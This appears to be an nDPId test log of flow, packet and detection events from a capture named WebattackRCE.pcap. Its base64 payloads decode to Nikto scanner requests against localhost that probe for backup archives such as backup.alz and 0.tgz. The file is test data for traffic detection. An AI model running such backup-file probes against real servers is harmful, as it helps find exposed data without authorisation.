00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":331,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277203,"flow_last_seen":1576420277203,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277203,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50206,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":331,"flow_packet_id":1,"flow_last_seen":1576420277203,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277203,"pkt":"AAAAAAAAAAAAAAAACABFAADBfg5AAEAGviZ\/AAABfwAAAcQeH5A6WEaZ3wpBiYAYAED+tQAAAQEICp1m\/PudZvz7R0VUIC8xMjcwMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":331,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277203,"flow_last_seen":1576420277203,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277203,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50206,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":332,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277204,"flow_last_seen":1576420277204,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277204,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50208,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":332,"flow_packet_id":1,"flow_last_seen":1576420277204,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277204,"pkt":"AAAAAAAAAAAAAAAACABFAADBsIBAAEAGi7R\/AAABfwAAAcQgH5BX0ojsod\/7v4AYAED+tQAAAQEICp1m\/PydZvz8R0VUIC8xMjcwMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":332,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277204,"flow_last_seen":1576420277204,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277204,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50208,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":333,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277206,"flow_last_seen":1576420277206,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277206,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50210,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":333,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":1,"flow_last_seen":1576420277206,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277206,"pkt":"AAAAAAAAAAAAAAAACABFAADEp6FAAEAGlJB\/AAABfwAAAcQiH5DXnp8L7+WKyYAYAED+uAAAAQEICp1m\/P6dZvz+R0VUIC8xMjcwLnRhci5iejIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277206,"flow_last_seen":1576420277206,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277206,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50210,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":334,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277207,"flow_last_seen":1576420277207,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277207,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50212,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":334,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":1,"flow_last_seen":1576420277207,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277207,"pkt":"AAAAAAAAAAAAAAAACABFAADELblAAEAGDnl\/AAABfwAAAcQkH5A1yBUjW63h5IAYAED+uAAAAQEICp1m\/P+dZvz\/R0VUIC8xMjcwLnRhci5iejIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":334,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277207,"flow_last_seen":1576420277207,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277207,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50212,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":335,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277209,"flow_last_seen":1576420277209,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277209,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50214,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":1,"flow_last_seen":1576420277209,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277209,"pkt":"AAAAAAAAAAAAAAAACABFAADDSgRAAEAG8i5\/AAABfwAAAcQmH5DZEXKVufuNq4AYAED+twAAAQEICp1m\/QCdZv0AR0VUIC8xMjcuMC4wLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":335,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277209,"flow_last_seen":1576420277209,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277209,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50214,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":336,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277210,"flow_last_seen":1576420277210,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277210,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50216,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":336,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_packet_id":1,"flow_last_seen":1576420277210,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277210,"pkt":"AAAAAAAAAAAAAAAACABFAADDtt9AAEAGhVN\/AAABfwAAAcQoH5DVr45M6gY7v4AYAED+twAAAQEICp1m\/QKdZv0CR0VUIC8xMjcuMC4wLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":336,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277210,"flow_last_seen":1576420277210,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277210,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50216,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":337,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277211,"flow_last_seen":1576420277211,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277211,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50218,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_packet_id":1,"flow_last_seen":1576420277211,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277211,"pkt":"AAAAAAAAAAAAAAAACABFAAC9XspAAEAG3W5\/AAABfwAAAcQqH5Bdf2ZfE+bMgYAYAED+sQAAAQEICp1m\/QOdZv0DR0VUIC8wLnRneiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":337,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277211,"flow_last_seen":1576420277211,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277211,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50218,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":338,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277213,"flow_last_seen":1576420277213,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277213,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50220,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_packet_id":1,"flow_last_seen":1576420277213,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277213,"pkt":"AAAAAAAAAAAAAAAACABFAAC9v\/9AAEAGfDl\/AAABfwAAAcQsH5CYPYdrmayyCIAYAED+sQAAAQEICp1m\/QWdZv0FR0VUIC8wLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":338,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277213,"flow_last_seen":1576420277213,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277213,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50220,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":339,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277215,"flow_last_seen":1576420277215,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277215,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50222,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_packet_id":1,"flow_last_seen":1576420277215,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277215,"pkt":"AAAAAAAAAAAAAAAACABFAADCrDVAAEAGj\/5\/AAABfwAAAcQuH5DnZJSlMCY5doAYAED+tgAAAQEICp1m\/QedZv0GR0VUIC9iYWNrdXAuYWx6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":339,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277215,"flow_last_seen":1576420277215,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277215,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50222,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":340,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277216,"flow_last_seen":1576420277216,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277216,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50224,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_packet_id":1,"flow_last_seen":1576420277216,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277216,"pkt":"AAAAAAAAAAAAAAAACABFAADC6alAAEAGUop\/AAABfwAAAcQwH5AB5dFAi0ifwYAYAED+tgAAAQEICp1m\/QidZv0IR0VUIC9iYWNrdXAuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277216,"flow_last_seen":1576420277216,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277216,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50224,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":341,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277217,"flow_last_seen":1576420277217,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50226,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_packet_id":1,"flow_last_seen":1576420277217,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277217,"pkt":"AAAAAAAAAAAAAAAACABFAADHXwtAAEAG3SN\/AAABfwAAAcQyH5CeyGeSqwnqXYAYAED+uwAAAQEICp1m\/QmdZv0JR0VUIC8xMjcwMDEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277217,"flow_last_seen":1576420277217,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50226,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
